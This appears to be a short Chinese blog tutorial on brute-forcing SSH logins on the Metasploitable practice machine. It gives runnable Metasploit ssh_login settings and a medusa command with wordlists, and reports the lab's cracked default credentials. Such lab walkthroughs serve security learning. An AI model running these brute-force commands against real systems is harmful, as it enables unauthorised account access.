对metasploitble测试平台进行ssh爆破

发布于 2020-03-13  请安装插件 WP-Statistics 次阅读


一个用户字典,一个密码字典,也可以一个字典同时当用户名和密码用。可以在创建一个目录并创建这两个字典 (mkdir /tools/zidian ; touch /tools/zidian/ssh_user.txt ; touch /tools/zidian/ssh_pass.txt) 字典内容随心所欲,但是如果字典太大,可能会造成暴力破解时间过长。不过可以大大增加成功率。

#Ssh暴力破解有两种方法#

一是使用metasploit
搜索 (search)ssh_login 这个工具进行暴力破解,需要设置用户名字典 set USER_FILE /tools/zidian/ssh_user.txt 和密码字典 set PASS_FILE /tools/zidian/ssh_pass.txt 最重要的是设置目标IP set RHOST 192.168.1.1还有设置一下线程 set THREADS 1000(根据自己电脑性能设置) 最后运行 run 。。开始暴力破解。

第二种方法是使用 medusa 爆破工具
-l指定地址 、-U 指定用户字典 - P指定密码字典 -M 选择爆破类型。
使用方法: medusa -h 192.168.1.1 -U /tools/zidian/ssh_user.txt -P /tools/zidian/ssh_pass.txt -M ssh

OK ,可以看出,爆破出了两个账号和密码。一个是 user user 一个是 msfadmin msfadmin 然后可以登录一下ssh 指定用户登录方法 ssh -l user(或是msfadmin)192.168.1.1 回车后输入密码后登录

不指定用户:

指定用户:

ssh -l user 192.168.1.1
ssh user@192.168.1.1

如果修改过ssh登录端口的可以:

ssh -p 12333 192.168.1.1
ssh -l user -p 12333 192.168.1.1
 ssh -p 12333 user@192.168.1.1

一条咸鱼